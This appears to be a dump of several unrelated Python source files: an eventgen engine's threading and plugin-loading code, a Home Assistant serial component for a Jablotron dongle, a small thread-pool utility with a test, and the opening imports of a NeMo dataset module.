from __main__ and will hand the argument object to the config parser of eventgen5. This will provide the
bridge to using the old code with the newer style. As things get moved from the config parser, this should
start to control all of the configuration items that are global, and the config object should only handle the
localized .conf entries.
:param args: __main__ parse_args() object.
'''
self.stop_request = Event()
self.force_stop = False
self.started = False
self.completed = False
self.config = None
self.args = args
self.workerPool = []
self.manager = None
self._setup_loggers(args=args)
# attach to the logging queue
self.logger.info("Logging Setup Complete.")
self._generator_queue_size = getattr(self.args, 'generator_queue_size', 500)
if self._generator_queue_size < 0:
self._generator_queue_size = 0
self.logger.info("Set generator queue size:{}".format(self._generator_queue_size))
if self.args and 'configfile' in self.args and self.args.configfile:
self._load_config(self.args.configfile, args=args)
def _load_config(self, configfile, **kwargs):
'''
        This method will use a configfile and set self.config to a processed Config object;
        kwargs will need to match eventgenconfig.py.
:param configfile:
:return:
'''
# TODO: The old eventgen had strange cli args. We should probably update the module args to match this usage.
new_args = {}
if "args" in kwargs:
args = kwargs["args"]
outputer = [key for key in ["keepoutput", "devnull", "modinput"] if getattr(args, key)]
if len(outputer) > 0:
new_args["override_outputter"] = outputer[0]
if getattr(args, "count"):
new_args["override_count"] = args.count
if getattr(args, "interval"):
new_args["override_interval"] = args.interval
if getattr(args, "backfill"):
new_args["override_backfill"] = args.backfill
if getattr(args, "end"):
new_args["override_end"] = args.end
if getattr(args, "multiprocess"):
new_args["threading"] = "process"
if getattr(args, "generators"):
new_args["override_generators"] = args.generators
if getattr(args, "disableOutputQueue"):
new_args["override_outputqueue"] = args.disableOutputQueue
if getattr(args, "profiler"):
new_args["profiler"] = args.profiler
if getattr(args, "sample"):
new_args["sample"] = args.sample
if getattr(args, "verbosity"):
new_args["verbosity"] = args.verbosity
self.config = Config(configfile, **new_args)
self.config.parse()
self.args.multiprocess = True if self.config.threading == "process" else self.args.multiprocess
self._reload_plugins()
if "args" in kwargs and getattr(kwargs["args"], "generators"):
generator_worker_count = kwargs["args"].generators
else:
generator_worker_count = self.config.generatorWorkers
self._setup_pools(generator_worker_count)
def _reload_plugins(self):
# Initialize plugins
# Plugins must be loaded before objects that do work, otherwise threads and processes generated will not have
# the modules loaded in active memory.
try:
self.config.outputPlugins = {}
plugins = self._initializePlugins(
os.path.join(FILE_PATH, 'lib', 'plugins', 'output'), self.config.outputPlugins, 'output')
self.config.validOutputModes.extend(plugins)
self._initializePlugins(
os.path.join(FILE_PATH, 'lib', 'plugins', 'generator'), self.config.plugins, 'generator')
plugins = self._initializePlugins(
os.path.join(FILE_PATH, 'lib', 'plugins', 'rater'), self.config.plugins, 'rater')
self.config._complexSettings['rater'] = plugins
except Exception as e:
self.logger.exception(str(e))
def _load_custom_plugins(self, PluginNotLoadedException):
plugintype = PluginNotLoadedException.type
plugin = PluginNotLoadedException.name
bindir = PluginNotLoadedException.bindir
plugindir = PluginNotLoadedException.plugindir
pluginsdict = self.config.plugins if plugintype in ('generator', 'rater') else self.config.outputPlugins
# APPPERF-263: be picky when loading from an app bindir (only load name)
self._initializePlugins(bindir, pluginsdict, plugintype, name=plugin)
# APPPERF-263: be greedy when scanning plugin dir (eat all the pys)
self._initializePlugins(plugindir, pluginsdict, plugintype)
def _setup_pools(self, generator_worker_count):
'''
This method is an internal method called on init to generate pools needed for processing.
:return:
'''
# Load the things that actually do the work.
self._create_generator_pool()
self._create_timer_threadpool()
self._create_output_threadpool()
self._create_generator_workers(generator_worker_count)
def _create_timer_threadpool(self, threadcount=100):
'''
Timer threadpool is used to contain the timer object for each sample. A timer will stay active
until the end condition is met for the sample. If there is no end condition, the timer will exist forever.
:param threadcount: is how many active timers we want to allow inside of eventgen. Default 100. If someone
has over 100 samples, additional samples won't run until the first ones end.
:return:
'''
self.sampleQueue = Queue(maxsize=0)
num_threads = threadcount
for i in range(num_threads):
worker = Thread(target=self._worker_do_work, args=(
self.sampleQueue,
self.loggingQueue,
), name="TimeThread{0}".format(i))
worker.setDaemon(True)
worker.start()
def _create_output_threadpool(self, threadcount=1):
'''
the output thread pool is used for output plugins that need to control file locking, or only have 1 set thread
        to send all the data out of. This FIFO queue just helps make sure there are no file or write collisions.
        There's only 1 active thread for this queue; if you're ever considering upping this, don't. Just shut off the
        outputQueue and let each generator directly output its data.
:param threadcount: is how many active output threads we want to allow inside of eventgen. Default 1
:return:
'''
# TODO: Make this take the config param and figure out what we want to do with this.
if getattr(self, "manager", None):
self.outputQueue = self.manager.Queue(maxsize=500)
else:
self.outputQueue = Queue(maxsize=500)
num_threads = threadcount
for i in range(num_threads):
worker = Thread(target=self._worker_do_work, args=(
self.outputQueue,
self.loggingQueue,
), name="OutputThread{0}".format(i))
worker.setDaemon(True)
worker.start()
def _create_generator_pool(self, workercount=20):
'''
The generator pool has two main options, it can run in multiprocessing or in threading. We check the argument
from configuration, and then build the appropriate queue type. Each time a timer runs for a sample, if the
timer says it's time to generate, it will create a new generator plugin object, and place it in this queue.
        :param workercount: is how many active workers we want to allow inside of eventgen. Default 20. If someone
                            has over 20 generators working, additional samples won't run until the first ones end.
:return:
'''
if self.args.multiprocess:
self.manager = multiprocessing.Manager()
if self.config and self.config.disableLoggingQueue:
self.loggingQueue = None
else:
# TODO crash caused by logging Thread https://github.com/splunk/eventgen/issues/217
self.loggingQueue = self.manager.Queue()
self.logging_thread = Thread(target=self.logger_thread, args=(self.loggingQueue, ), name="LoggerThread")
self.logging_thread.start()
# since we're now in multiprocess, we need to use better queues.
self.workerQueue = multiprocessing.JoinableQueue(maxsize=self._generator_queue_size)
self.genconfig = self.manager.dict()
self.genconfig["stopping"] = False
else:
self.workerQueue = Queue(maxsize=self._generator_queue_size)
worker_threads = workercount
if hasattr(self.config, 'outputCounter') and self.config.outputCounter:
self.output_counters = []
for i in range(workercount):
self.output_counters.append(OutputCounter())
for i in range(worker_threads):
worker = Thread(target=self._generator_do_work, args=(self.workerQueue, self.loggingQueue,
self.output_counters[i]))
worker.setDaemon(True)
worker.start()
else:
for i in range(worker_threads):
worker = Thread(target=self._generator_do_work, args=(self.workerQueue, self.loggingQueue, None))
worker.setDaemon(True)
worker.start()
def _create_generator_workers(self, workercount=20):
if self.args.multiprocess:
import multiprocessing
self.workerPool = []
for worker in range(workercount):
# builds a list of tuples to use the map function
disable_logging = True if self.args and self.args.disable_logging else False
process = multiprocessing.Process(target=self._proc_worker_do_work, args=(
self.workerQueue,
self.loggingQueue,
self.genconfig,
disable_logging
))
self.workerPool.append(process)
process.start()
self.logger.info("create process: {}".format(process.pid))
else:
pass
def _setup_loggers(self, args=None):
if args and args.disable_logging:
logger.handlers = []
logger.addHandler(logging.NullHandler())
self.logger = logger
self.loggingQueue = None
if args and args.verbosity:
self.logger.setLevel(args.verbosity)
# Set the default log level to ERROR when directly called Generator in tests
        if args is None or args.verbosity is None:
self.logger.setLevel(logging.ERROR)
def _worker_do_work(self, work_queue, logging_queue):
while not self.stop_request.isSet():
try:
item = work_queue.get(timeout=10)
startTime = time.time()
item.run()
totalTime = time.time() - startTime
if totalTime > self.config.interval and self.config.end != 1:
self.logger.warning("work took longer than current interval, queue/threading throughput limitation")
work_queue.task_done()
except Empty:
pass
except EOFError as ef:
self.logger.exception(str(ef))
continue
except Exception as e:
self.logger.exception(str(e))
raise e
def _generator_do_work(self, work_queue, logging_queue, output_counter=None):
while not self.stop_request.isSet():
try:
item = work_queue.get(timeout=10)
startTime = time.time()
item.run(output_counter=output_counter)
totalTime = time.time() - startTime
if totalTime > self.config.interval and item._sample.end != 1:
self.logger.warning("work took longer than current interval, queue/threading throughput limitation")
work_queue.task_done()
except Empty:
pass
except EOFError as ef:
self.logger.exception(str(ef))
continue
except Exception as e:
if self.force_stop:
break
self.logger.exception(str(e))
raise e
@staticmethod
def _proc_worker_do_work(work_queue, logging_queue, config, disable_logging):
genconfig = config
stopping = genconfig['stopping']
root = logging.getLogger()
root.setLevel(logging.DEBUG)
if logging_queue is not None:
# TODO https://github.com/splunk/eventgen/issues/217
qh = logging.handlers.QueueHandler(logging_queue)
root.addHandler(qh)
else:
if disable_logging:
root.addHandler(logging.NullHandler())
else:
root.addHandler(logging.StreamHandler())
while not stopping:
try:
root.info("Checking for work")
item = work_queue.get(timeout=10)
item.logger = root
item._out.updateConfig(item.config)
item.run()
work_queue.task_done()
item.logger.info("Current Worker Stopping: {0}".format(stopping))
item.logger = None
stopping = genconfig['stopping']
except Empty:
stopping = genconfig['stopping']
except Exception as e:
root.exception(e)
raise e
else:
root.info("Stopping Process")
sys.exit(0)
def logger_thread(self, loggingQueue):
while not self.stop_request.isSet():
try:
record = loggingQueue.get(timeout=10)
logger.handle(record)
loggingQueue.task_done()
except Empty:
pass
except Exception as e:
if self.force_stop:
break
self.logger.exception(str(e))
raise e
def _initializePlugins(self, dirname, plugins, plugintype, name=None):
"""Load a python module dynamically and add to internal dictionary of plugins (only accessed by getPlugin)"""
ret = []
syspathset = set(sys.path)
dirname = os.path.abspath(dirname)
self.logger.debug("looking for plugin(s) in {}".format(dirname))
if not os.path.isdir(dirname):
self.logger.debug("directory {} does not exist ... moving on".format(dirname))
return ret
# Include all plugin directories in sys.path for includes
if dirname not in sys.path:
syspathset.add(dirname)
sys.path = list(syspathset)
# Loop through all files in passed dirname looking for plugins
for filename in os.listdir(dirname):
filename = dirname + os.sep + filename
# If the file exists
if os.path.isfile(filename):
# Split file into a base name plus extension
basename = os.path.basename(filename)
base, extension = os.path.splitext(basename)
# If we're a python file and we don't start with _
# if extension == ".py" and not basename.startswith("_"):
# APPPERF-263: If name param is supplied, only attempt to load
# {name}.py from {app}/bin directory
if extension == ".py" and ((name is None and not basename.startswith("_")) or base == name):
self.logger.debug("Searching for plugin in file '%s'" % filename)
try:
# Import the module
# module = imp.load_source(base, filename)
mod_name, mod_path, mod_desc = imp.find_module(base, [dirname])
# TODO: Probably need to adjust module.load() to be added later so this can be pickled.
module = imp.load_module(base, mod_name, mod_path, mod_desc)
plugin = module.load()
# spec = importlib.util.spec_from_file_location(base, filename)
# plugin = importlib.util.module_from_spec(spec)
# spec.loader.exec_module(plugin)
# set plugin to something like output.file or generator.default
pluginname = plugintype + '.' + base
plugins[pluginname] = plugin
# Return is used to determine valid configs, so only return the base name of the plugin
ret.append(base)
self.logger.debug("Loading module '%s' from '%s'" % (pluginname, basename))
# 12/3/13 If we haven't loaded a plugin right or we haven't initialized all the variables
# in the plugin, we will get an exception and the plan is to not handle it
if 'validSettings' in dir(plugin):
self.config._validSettings.extend(plugin.validSettings)
if 'defaultableSettings' in dir(plugin):
self.config._defaultableSettings.extend(plugin.defaultableSettings)
if 'intSettings' in dir(plugin):
self.config._intSettings.extend(plugin.intSettings)
if 'floatSettings' in dir(plugin):
self.config._floatSettings.extend(plugin.floatSettings)
if 'boolSettings' in dir(plugin):
self.config._boolSettings.extend(plugin.boolSettings)
if 'jsonSettings' in dir(plugin):
self.config._jsonSettings.extend(plugin.jsonSettings)
if 'complexSettings' in dir(plugin):
self.config._complexSettings.update(plugin.complexSettings)
except ValueError:
self.logger.error("Error loading plugin '%s' of type '%s'" % (base, plugintype))
except ImportError as ie:
self.logger.warning("Could not load plugin: %s, skipping" % base)
self.logger.exception(ie)
except Exception as e:
self.logger.exception(str(e))
raise e
return ret
def start(self, join_after_start=True):
self.stop_request.clear()
self.started = True
self.config.stopping = False
self.completed = False
if len(self.config.samples) <= 0:
self.logger.info("No samples found. Exiting.")
for s in self.config.samples:
if s.interval > 0 or s.mode == 'replay' or s.end != "0":
self.logger.info("Creating timer object for sample '%s' in app '%s'" % (s.name, s.app))
# This is where the timer is finally sent to a queue to be processed. Needs to move to this object.
try:
t = Timer(1.0, sample=s, config=self.config, genqueue=self.workerQueue,
outputqueue=self.outputQueue, loggingqueue=self.loggingQueue)
except PluginNotLoaded as pnl:
self._load_custom_plugins(pnl)
t = Timer(1.0, sample=s, config=self.config, genqueue=self.workerQueue,
outputqueue=self.outputQueue, loggingqueue=self.loggingQueue)
except Exception as e:
raise e
self.sampleQueue.put(t)
if join_after_start:
self.logger.info("All timers started, joining queue until it's empty.")
self.join_process()
def join_process(self):
'''
This method will attach the current object to the queues existing for generation and will call stop after all
generation is complete. If the queue never finishes, this will lock the main process to the child indefinitely.
:return:
'''
try:
while not self.sampleQueue.empty() or self.sampleQueue.unfinished_tasks > 0 or not self.workerQueue.empty():
time.sleep(5)
self.logger.info("All timers have finished, signalling workers to exit.")
self.stop()
except Exception as e:
self.logger.exception(str(e))
raise e
def stop(self, force_stop=False):
if hasattr(self.config, "stopping"):
self.config.stopping = True
self.force_stop = force_stop
# set the thread event to stop threads
self.stop_request.set()
# if we're in multiprocess, make sure we don't add more generators after the timers stopped.
if self.args.multiprocess:
if force_stop:
self.kill_processes()
else:
if hasattr(self, "genconfig"):
self.genconfig["stopping"] = True
for worker in self.workerPool:
count = 0
# We wait for a minute until terminating the worker
                    while worker.exitcode is None:
if count == 30:
self.logger.info("Terminating worker {0}".format(worker._name))
worker.terminate()
count = 0
break
self.logger.info("Worker {0} still working, waiting for it to finish.".format(worker._name))
time.sleep(2)
count += 1
self.started = False
# clear the thread event
self.stop_request.clear()
def reload_conf(self, configfile):
'''
This method will allow a user to supply a new .conf file for generation and reload the sample files.
:param configfile:
:return:
'''
self._load_config(configfile=configfile)
self.logger.debug("Config File Loading Complete.")
def check_running(self):
'''
:return: if eventgen is running, return True else False
'''
if hasattr(self, "outputQueue") and hasattr(self, "sampleQueue") and hasattr(self, "workerQueue"):
# If all queues are not empty, eventgen is running.
# If all queues are empty and all tasks are finished, eventgen is not running.
# If all queues are empty and there is an unfinished task, eventgen is running.
if not self.args.multiprocess:
if self.outputQueue.empty() and self.sampleQueue.empty() and self.workerQueue.empty() \
and self.sampleQueue.unfinished_tasks <= 0 \
and self.outputQueue.unfinished_tasks <= 0 \
and self.workerQueue.unfinished_tasks <= 0:
self.logger.info("Queues are all empty and there are no pending tasks")
return self.started
else:
return True
else:
if self.outputQueue.empty() and self.sampleQueue.empty() and self.workerQueue.empty() \
and self.sampleQueue.unfinished_tasks <= 0:
self.logger.info("Queues are all empty and there are no pending tasks")
return self.started
else:
return True
return False
def check_done(self):
'''
:return: if eventgen jobs are finished, return True else False
'''
return self.sampleQueue.empty() and self.sampleQueue.unfinished_tasks <= 0 and self.workerQueue.empty()
def kill_processes(self):
self.logger.info("Kill worker processes")
for worker in self.workerPool:
try:
self.logger.info("Kill worker process: {}".format(worker.pid))
os.kill(int(worker.pid), signal.SIGKILL)
except Exception as e:
                self.logger.error(str(e))
continue
self.workerPool = []
if self.manager:
self.manager.shutdown()
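# Illustrative sketch, not part of the original module: EventGenerator expects the
# argparse namespace normally produced by __main__. The namespace below only defines
# the attributes read by _setup_loggers()/_load_config(); the .conf path is a placeholder.
def _example_engine_bootstrap():
    from argparse import Namespace
    sketch_args = Namespace(
        configfile="eventgen_sample.conf",  # placeholder path to a real eventgen .conf
        disable_logging=False, verbosity=None, generator_queue_size=500,
        keepoutput=False, devnull=False, modinput=False,
        count=None, interval=None, backfill=None, end=None,
        multiprocess=False, generators=None, disableOutputQueue=False,
        profiler=False, sample=None)
    engine = EventGenerator(args=sketch_args)
    engine.start(join_after_start=True)  # blocks until all samples finish, then signals workers to stop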
|
jablo_dongle.py
|
"""
homeassistant.components.jablo_dongle
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Implements support for Turris Dongle by Jablotron Alarms, a.s.
"""
from enum import Enum
import logging
import threading
from threading import Condition, Lock
from pydispatch import dispatcher
import serial
from serial.serialutil import SerialException
from homeassistant.const import (EVENT_HOMEASSISTANT_START, EVENT_HOMEASSISTANT_STOP, EVENT_PLATFORM_DISCOVERED,
ATTR_SERVICE, ATTR_DISCOVERED)
from homeassistant.helpers.entity_component import EntityComponent
oldfw = False
DOMAIN = "jablo_dongle"
DEPENDENCIES = []
SERIAL_PORT = "port"
MESSAGE_RECEIVED_SIGNAL = 'ja_msg_recv_sig'
_LOGGER = logging.getLogger(__name__)
NETWORK = None
DISCOVER_SENSORS = "jablo_dongle.sensors"
DISCOVER_THERMOSTATS = "jablo_dongle.thermostats"
def peripheries_setup(hass, config):
""" This method does initialization of components that use discovery.
    Calling component setup from here is a bit hacky; however, the current version
    of HA does not offer a simple way of doing this from third-party components
    (i.e. modifying sensor.__init__/thermostat.__init__ would be needed otherwise).
"""
from homeassistant.components.thermostat import (
SCAN_INTERVAL as THERMOSTAT_SCAN_INTERVAL,
DOMAIN as THERMOSTAT_DOMAIN
)
thermostats = EntityComponent(_LOGGER, THERMOSTAT_DOMAIN, hass, THERMOSTAT_SCAN_INTERVAL, discovery_platforms={
DISCOVER_THERMOSTATS: 'jablo_dongle'
})
thermostats.setup(config)
from homeassistant.components.sensor import (
SCAN_INTERVAL as SENSOR_SCAN_INTERVAL,
DOMAIN as SENSOR_DOMAIN
)
sensors = EntityComponent(_LOGGER, SENSOR_DOMAIN, hass, SENSOR_SCAN_INTERVAL, discovery_platforms={
DISCOVER_SENSORS: 'jablo_dongle'
})
sensors.setup(config)
def setup(hass, config):
""" Setup component. """
global NETWORK
NETWORK = JabloDongle(hass, config[DOMAIN][SERIAL_PORT])
def stop_dongle(event):
""" Stop Modbus service. """
NETWORK.disconnect()
def start_dongle(event):
""" Start Modbus service. """
if NETWORK.connect() is False:
return False
NETWORK.read_slots()
NETWORK.insert_devices()
hass.bus.listen_once(EVENT_HOMEASSISTANT_STOP, stop_dongle)
return True
hass.bus.listen_once(EVENT_HOMEASSISTANT_START, start_dongle)
peripheries_setup(hass, config)
# Tells the bootstrapper that the component was successfully initialized
return True
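# Illustrative sketch, not part of the original component: setup() expects the
# component configuration keyed by DOMAIN, with the serial device under SERIAL_PORT.
# The device path below is a placeholder.
_EXAMPLE_CONFIG = {
    DOMAIN: {
        SERIAL_PORT: "/dev/ttyUSB0",  # placeholder serial device of the Turris Dongle
    }
}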
class TxState:
def __init__(self):
self.enroll = False
self.pgx = False
self.pgy = False
self.alarm = False
self.beep = 'NONE'
class JabloDongle:
def __init__(self, hass, port):
self._hass = hass
self._portname = port
self._serial = None
self._readthread = None
self.last_mid = 0
self.last_mtype = JaMtype.UNDEF
self.tx_state = TxState()
self.slots = []
self.slot_read_cond = Condition()
self._tx_lock = Lock()
def serial_read_loop(self):
while True:
data = self._serial.readline().decode('ascii', 'replace')
if len(data) == 1:
continue
# _LOGGER.error("Received data: %s" % (data))
jmsg = JaMessage(data)
if jmsg.mid is None and \
(jmsg.mtype != NETWORK.last_mtype or (jmsg.mtype != JaMtype.SET and jmsg.mtype != JaMtype.INT)):
NETWORK.process_message(jmsg)
NETWORK.last_mtype = jmsg.mtype
elif jmsg.mid != NETWORK.last_mid:
NETWORK.process_message(jmsg)
NETWORK.last_mid = jmsg.mid
def connect(self):
try:
self._serial = serial.Serial(self._portname, 57600)
except SerialException as ex:
_LOGGER.error("Cannot open serial port %s (%s)" % (self._portname, ex))
return False
# self._serial.flush()
_LOGGER.info("Serial port %s opened" % self._portname)
self._readthread = threading.Thread(target=self.serial_read_loop)
self._readthread.start()
_LOGGER.info("Receiving thread started")
return True
# self.transmit_state()
def disconnect(self):
self._serial.close()
def process_message(self, jmsg):
if jmsg.mtype == JaMtype.UNDEF:
_LOGGER.warning("Unknown message received: '%s'", jmsg.text.encode('utf-8'))
return
if jmsg.mtype != JaMtype.SLOT \
and jmsg.mtype != JaMtype.VERSION \
and jmsg.mtype != JaMtype.OK \
and jmsg.mtype != JaMtype.ERR:
_LOGGER.info("Received message of type %s from device %d (%s)" % (jmsg.mtype, jmsg.did, jmsg.devmodel))
if jmsg.mtype == JaMtype.SLOT:
if jmsg.slotval is not None:
_LOGGER.info(
"Slot %d: %d (%s)" % (jmsg.slotnum, jmsg.slotval, JaDevice.get_model_from_id(jmsg.slotval)))
self.slots.append({'num': jmsg.slotnum, 'dev': JaDevice(jmsg.slotval)})
self.slot_read_cond.acquire()
self.slot_read_cond.notify()
self.slot_read_cond.release()
else:
dispatcher.send(MESSAGE_RECEIVED_SIGNAL, **{'jmsg': jmsg})
def transmit_state(self):
tx_string = "\nTX ENROLL:%d PGX:%d PGY:%d ALARM:%d BEEP:%s\n" % (
self.tx_state.enroll, self.tx_state.pgx, self.tx_state.pgy, self.tx_state.alarm, self.tx_state.beep
)
self._tx_lock.acquire()
self._serial.write(tx_string.encode())
self._serial.flush()
self._tx_lock.release()
def read_slots(self):
for i in range(32):
self._serial.write(("\nGET SLOT:%02d\n" % i).encode())
self._serial.flush()
self.slot_read_cond.acquire()
self.slot_read_cond.wait()
self.slot_read_cond.release()
def insert_devices(self):
for slot in self.slots:
jdev = slot['dev']
if jdev.model == "TP-82N":
self._hass.bus.fire(EVENT_PLATFORM_DISCOVERED, {
ATTR_SERVICE: DISCOVER_THERMOSTATS,
ATTR_DISCOVERED: {
'did': jdev.did,
'model': jdev.model
}
})
else:
self._hass.bus.fire(EVENT_PLATFORM_DISCOVERED, {
ATTR_SERVICE: DISCOVER_SENSORS,
ATTR_DISCOVERED: {
'did': jdev.did,
'model': jdev.model
}
})
class JaMtype(Enum):
UNDEF = 0
ARM = 1
DISARM = 2
BEACON = 3
SENSOR = 4
TAMPER = 5
PANIC = 6
DEFECT = 7
BUTTON = 8
SET = 9
INT = 10
OK = 11
ERR = 12
SLOT = 13
VERSION = 14
class JaMessage:
def __init__(self, msgline):
self._text = msgline.rstrip()
self.did = None
self.mid = None
self.devmodel = None
self.mtype = JaMtype.UNDEF
self.act = None
self.lb = None
self.blackout = None
self.temp = None
self.slotnum = None
self.slotval = None
self.version = None
try:
if self.text == "OK":
self.mtype = JaMtype.OK
elif self.text == "ERROR":
self.mtype = JaMtype.ERR
elif self.text.startswith("TURRIS DONGLE V"):
self.mtype = JaMtype.VERSION
self.version = self.text[15:-1]
elif self.text.startswith("SLOT:"):
self.mtype = JaMtype.SLOT
self.slotnum = int(self.text[5:7], base=10)
try:
self.slotval = int(self.text[9:17], base=10)
except ValueError:
self.slotval = None
else:
tokens = self.text.split()
self.did = int(tokens[0][1:-1], 10)
# Hack to support old fw, remove in final version
global oldfw
if oldfw:
if tokens[1] != "ID:---":
self.mid = int(tokens[1][3:], 10)
self.devmodel = tokens[2]
else:
self.devmodel = tokens[1]
if oldfw:
if tokens[3] == "SENSOR":
self.mtype = JaMtype.SENSOR
elif tokens[3] == "TAMPER":
self.mtype = JaMtype.TAMPER
elif tokens[3] == "BEACON":
self.mtype = JaMtype.BEACON
elif tokens[3] == "BUTTON":
self.mtype = JaMtype.BUTTON
elif tokens[3] == "ARM:1":
self.mtype = JaMtype.ARM
elif tokens[3] == "ARM:0":
self.mtype = JaMtype.DISARM
elif tokens[3][0:4] == "SET:":
self.mtype = JaMtype.SET
if len(tokens[3]) > 4:
self.temp = float(tokens[3][4:8])
else:
self.temp = float(tokens[4][0:3])
elif tokens[3][0:4] == "INT:":
self.mtype = JaMtype.INT
if len(tokens[3]) > 4:
self.temp = float(tokens[3][4:8])
else:
self.temp = float(tokens[4][0:3])
else:
self.mtype = JaMtype.UNDEF
else:
if tokens[2] == "SENSOR":
self.mtype = JaMtype.SENSOR
elif tokens[2] == "TAMPER":
self.mtype = JaMtype.TAMPER
elif tokens[2] == "BEACON":
self.mtype = JaMtype.BEACON
elif tokens[2] == "BUTTON":
self.mtype = JaMtype.BUTTON
elif tokens[2] == "ARM:1":
self.mtype = JaMtype.ARM
elif tokens[2] == "ARM:0":
self.mtype = JaMtype.DISARM
elif tokens[2][0:4] == "SET:":
self.mtype = JaMtype.SET
if len(tokens[2]) > 4:
self.temp = float(tokens[2][4:8])
else:
self.temp = float(tokens[3][0:3])
elif tokens[2][0:4] == "INT:":
self.mtype = JaMtype.INT
if len(tokens[2]) > 4:
self.temp = float(tokens[2][4:8])
else:
self.temp = float(tokens[3][0:3])
else:
self.mtype = JaMtype.UNDEF
for token in tokens[3:]:
if token.startswith("LB:"):
self.lb = int(token[3:])
elif token.startswith("ACT:"):
self.act = int(token[4:])
elif token.startswith("BLACKOUT:"):
                        self.blackout = int(token[9:])
except Exception:
self.mtype = JaMtype.UNDEF
@property
def text(self):
return self._text
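# A minimal illustrative sketch (not part of the original component): how a received line is turned
# into a JaMessage. The exact wire format below is an assumption inferred from the parser above, and
# it presumes the module-level ``oldfw`` flag defined elsewhere in this integration is False.
def _example_parse_message():
    msg = JaMessage("[12345678] JA-83M SENSOR LB:0 ACT:1\n")
    # Expected for the new firmware format: msg.did == 12345678, msg.devmodel == 'JA-83M',
    # msg.mtype == JaMtype.SENSOR, msg.lb == 0, msg.act == 1
    return msg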
class JaDevice:
def __init__(self, did):
self.did = did
self.model = self.get_model_from_id(did)
@staticmethod
def get_model_from_id(did):
if 0x800000 <= did <= 0x87FFFF:
return "RC-86K"
elif 0x900000 <= did <= 0x97FFFF:
return "RC-86K"
elif 0x180000 <= did <= 0x1BFFFF:
return "JA-81M"
elif 0x1C0000 <= did <= 0x1DFFFF:
return "JA-83M"
elif 0x640000 <= did <= 0x65FFFF:
return "JA-83P"
elif 0x7F0000 <= did <= 0x7FFFFF:
return "JA-82SH"
elif 0x760000 <= did <= 0x76FFFF:
return "JA-85ST"
elif 0x580000 <= did <= 0x59FFFF:
return "JA-80L"
elif 0xCF0000 <= did <= 0xCFFFFF:
return "AC-88"
elif 0x240000 <= did <= 0x25FFFF:
return "TP-82N"
else:
return "Unknown"
|
contractor.py
|
#!/usr/bin/env python
#coding:utf-8
"""
Author: --<v1ll4n>
Purpose: Provide some useful thread utils
Created: 2016/10/29
"""
import uuid
import time
import unittest
from Queue import Queue
import threading
from threading import Thread
import inspect
#----------------------------------------------------------------------
def start_thread(func, *args, **kwargs):
""""""
Thread(target=func, args=args, kwargs=kwargs).start()
########################################################################
class Contractor(object):
"""Create Multi-Thread to support the
concurrence of many tasks"""
#----------------------------------------------------------------------
def __init__(self, thread_max=50):
"""Constructor"""
self.task_list = []
self.result_queue = Queue()
self.signal_name = self._uuid1_str()
self.lock = threading.Lock()
self.thread_max = thread_max
self.current_thread_count = 0
def _uuid1_str(self):
'''Returns: random UUID tag '''
return str(uuid.uuid1())
def add_task(self, func, *args, **argv):
        '''Add a task to the pool; it will be executed once [run] is called.
        Params:
            func : a callable object implementing the task
            args : positional arguments passed to [func]
            argv : keyword arguments passed to [func]
        '''
        assert callable(func), '[!] func is not callable'
ret = {}
ret['func'] = func
ret['args'] = args
ret['argv'] = argv
ret['uuid'] = self.signal_name
self.task_list.append(ret)
def run(self):
""""""
Thread(target=self._run).start()
return self.result_queue
#----------------------------------------------------------------------
def _run(self):
""""""
for i in self.task_list:
#print self.current_thread_count
while self.thread_max <= self.current_thread_count:
time.sleep(0.3)
self._start_task(i)
def _start_task(self, task):
""""""
self.current_thread_count = self.current_thread_count + 1
try:
Thread(target=self._worker, args=(task,)).start()
except TypeError:
self.current_thread_count = self.current_thread_count - 1
def _worker(self, dictobj):
""""""
func = dictobj['func']
args = dictobj['args']
argv = dictobj['argv']
result = func(*args, **argv)
self.lock.acquire()
self._add_result_to_queue(result=result)
self.lock.release()
def _add_result_to_queue(self, **kw):
""""""
assert kw.has_key('result'), '[!] Result Error!'
self.result_queue.put(kw['result'])
self.current_thread_count = self.current_thread_count - 1
class UtilsTest(unittest.case.TestCase):
def runTest(self):
ms = inspect.getmembers(self)
ms = map(lambda x: x[0], ms)
for i in ms:
if callable(getattr(self,i)):
if i.startswith('test_'):
getattr(self, i)()
def test_pool(self):
def demo_task(*args):
'''simulate the plugin.run'''
print '[!] Computing!'
time.sleep(args[0])
print '[!] Finished!'
print
returns = 'Runtime Length : %s' % str(args)
return returns
pool = Contractor()
pool.add_task(demo_task, 7)
pool.add_task(demo_task, 3)
q = pool.run()
print pool.current_thread_count
self.assertIsInstance(q, Queue)
r = q.get()
print r
self.assertIsInstance(r, str)
r = q.get()
print r
self.assertIsInstance(r, str)
print pool.current_thread_count
if __name__ == '__main__':
unittest.main()
|
punctuation_capitalization_dataset.py
|
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__all__ = [
'BertPunctuationCapitalizationDataset',
'LABEL_ID_DIR_FOR_NEMO_CHECKPOINT',
'Progress',
'PunctuationCapitalizationEvalDataConfig',
'PunctuationCapitalizationTrainDataConfig',
'create_label_ids',
'create_masks_and_segment_ids',
'is_legacy_data_config',
'legacy_data_config_to_new_data_config',
'load_label_ids',
'raise_not_equal_labels_error',
'save_label_ids',
]
import itertools
import multiprocessing as mp
import os
import pickle
import random
from dataclasses import dataclass
from math import ceil
from pathlib import Path
from queue import Empty
from time import sleep
from typing import Any, Dict, List, Optional, Set, Tuple, Union
import numpy as np
import torch
from omegaconf import MISSING, DictConfig, OmegaConf
from tqdm import tqdm
from nemo.collections.common.tokenizers.tokenizer_spec import TokenizerSpec
from nemo.collections.nlp.data.data_utils.data_preprocessing import get_label_stats, get_stats
from nemo.core.classes import Dataset
from nemo.core.neural_types import ChannelType, LabelsType, MaskType, NeuralType
from nemo.utils import logging
MAX_NUM_QUERIES_IN_SPLIT = 10 ** 4
TOKENIZATION_PROGRESS_REPORT_PERIOD = 10 ** 3
BATCH_MARK_UP_PROGRESS_REPORT_PERIOD = 10 ** 4
BATCH_BUILDING_PROGRESS_REPORT_PERIOD = 10 ** 4
LABEL_ID_DIR_FOR_NEMO_CHECKPOINT = "label_id_files_for_nemo_checkpoint"
@dataclass
class PunctuationCapitalizationDataConfigBase:
